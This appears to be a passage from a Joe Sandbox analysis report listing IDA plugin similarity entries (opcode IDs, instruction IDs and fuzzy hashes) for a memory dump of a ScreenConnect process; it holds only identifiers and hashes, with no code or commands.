                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 59c3a4d2e5c0e364e876b834016785264e1b2a338cd7288b1ab43d3564710077
                                                                                                                                                                                                  • Instruction ID: 24ea0ae578c2a1b3fca8808e703e707000931b1a91f76f5c1cbc0602ef0fbf05
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59c3a4d2e5c0e364e876b834016785264e1b2a338cd7288b1ab43d3564710077
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6116D72A48A4A8FDB88EF29C451B6977E1FF58744B0440A9C44DCF287DE38E845CB41
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cd220a0ad3609469e2a0d1e94287057111271eaa4ffdf7c3214d697fa31d106f
                                                                                                                                                                                                  • Instruction ID: 273c7a9d7c8791237d126b25065b4e9912fd1ddbb6f632b04c22d978a26dccb1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd220a0ad3609469e2a0d1e94287057111271eaa4ffdf7c3214d697fa31d106f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15F0653644C69C5FCB42DB64D4518E57FB0FE56310B1501C7E04DCF053E7219A5ACB82
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.2611637872.00007FF887FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887FE0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff887fe0000_ScreenConnect.jbxd